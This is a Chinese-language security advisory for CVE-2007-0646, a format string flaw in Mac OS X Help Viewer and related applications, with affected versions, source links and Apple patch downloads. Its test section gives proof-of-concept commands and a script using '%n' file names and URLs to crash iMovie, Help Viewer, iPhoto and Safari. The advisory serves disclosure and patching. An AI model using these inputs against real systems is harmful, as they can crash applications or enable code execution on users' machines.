发布日期：2007-01-30
更新日期：2007-04-20

受影响系统：

Apple Mac OS X 10.4.9
Apple Mac OS X 10.3.9
Apple MacOS X Server 10.4.9
Apple MacOS X Server 10.3.9

描述：

---

BUGTRAQ  ID: 22326
CVE(CAN) ID: CVE-2007-0646

Mac OS X是苹果家族机器所使用的操作系统。

Mac OS X的帮助查看器中调用NSRunCriticalAlertPanel Apple AppKit函数处理畸形文件名时存在格式串处理漏洞，如果用户受骗下载并打开了带有特制文件名的帮助文件，就可能导致应用程序意外终止或执行任意指令。

<*来源：LMH （lmh@info-pull.com）
  
  链接：http://www.digitalmunition.com/MOAB-30-01-2007.html
        http://docs.info.apple.com/article.html?artnum=305391%3E
        http://docs.info.apple.com/article.html?artnum=307041
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

iMovie：
touch %n%n%n%n%n%n%n%n%n%n%n.imovieproj
open %n%n%n%n%n%n%n%n%n%n%n.imovieproj

帮助查看器：
touch %n%n%n%n%n%n%n%n%n%n%n.help
open %n%n%n%n%n%n%n%n%n%n%n.help

iPhoto：
open 'photo://%25n%25n%25n%25n%25n%25n'

Safari：
<script>
window.console.log('%n%n%nOh it takes a montage%n%n%n')
</script>

建议：

---

厂商补丁：

Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=13655&cat=1&platform=osx&method=sa/SecUpdSrvr2007-004Pan.dmg
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=13657&cat=1&platform=osx&method=sa/SecUpd2007-004Pan.dmg
http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=13659&cat=1&platform=osx&method=sa/SecUpd2007-004Univ.dmg

浏览次数：2710
严重程度：0（网友投票）